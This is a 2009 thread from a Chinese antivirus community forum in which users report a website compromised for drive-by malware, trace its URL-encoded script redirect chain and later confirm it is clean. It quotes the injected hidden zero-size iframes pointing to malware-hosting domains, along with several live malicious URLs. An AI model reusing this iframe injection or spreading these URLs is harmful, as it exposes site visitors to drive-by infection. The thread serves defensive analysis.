瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 给个挂马网站地址
★蓝色羽毛★ - 2009-5-11 8:50:00
http://www.xdjd999.com/main0.htm

用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) )
清水_无忧 - 2009-5-11 11:45:00
网页中http://%77%33%6F%67%2E%63%6E/%73%2E%6As地址被指向了http://100xx.com.cn/tj.htm。新地址存在<iframe src=http://www.shaduzhe.com/head.htm width=0 height=0></iframe>
<iframe src=http://www.aqbo.cn/top.htm width=0 height=0></iframe>
清水_无忧 - 2009-5-14 10:05:00
http://www.xdjd999.com/main0.htm
网站已经没有问题了
幸福耗子 - 2009-5-14 10:28:00
关于:hxxp://www.xdjd999.com/main0.htm解密的日志(全体输出 -  5):

Level  1>http://w3og.cn/s.js
Level  2>http://100xx.com.cn/tj.htm
Level  3>http://count48.51yes.com/click.aspx?id=485576456&logo=1
Level  2>http://www.xdjd999.com/ltsy/ltsy.htm
Level  2>http://www.xdjd999.com/main1.htm

此网址由幸福的耗子解密(本人博客www.mouse0232.com)

发现没有病毒连接了了
清水_无忧 - 2009-5-20 15:38:00
hxxp://www.xdjd*****9.com/main0.htm第六行恶意代码虽然没有去除,但是相关网页已经出现错误,所以暂时安全
1
查看完整版本: 给个挂马网站地址